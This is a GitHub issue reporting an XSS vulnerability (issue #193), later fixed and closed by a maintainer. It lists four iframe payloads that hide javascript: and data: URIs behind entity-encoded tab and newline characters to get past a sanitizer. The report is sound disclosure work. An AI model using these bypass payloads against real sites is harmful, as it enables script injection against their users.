Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

XSS 代码注入漏洞 #193

Closed
Chenrt-ggx opened this issue May 13, 2023 · 0 comments
Closed

XSS 代码注入漏洞 #193

Chenrt-ggx opened this issue May 13, 2023 · 0 comments
Assignees
Milestone

Comments

@Chenrt-ggx
Copy link

Payload:

<iframe src="java&Tab;script:alert('xss')"></iframe>
<iframe src="java&NewLine;script:alert('xss')"></iframe>
<iframe src="data&Tab;:text/html,%3Cscript%3Ealert('xss')%3C%2Fscript%3E"></iframe>
<iframe src="data&NewLine;:text/html,%3Cscript%3Ealert('xss')%3C%2Fscript%3E"></iframe>

PoC:

@88250 88250 self-assigned this May 14, 2023
@88250 88250 added this to the 1.7.6 milestone May 14, 2023
@88250 88250 changed the title XSS 代码注入漏洞(第二弹) XSS 代码注入漏洞 May 14, 2023
@88250 88250 closed this as completed in 438ec58 May 14, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

2 participants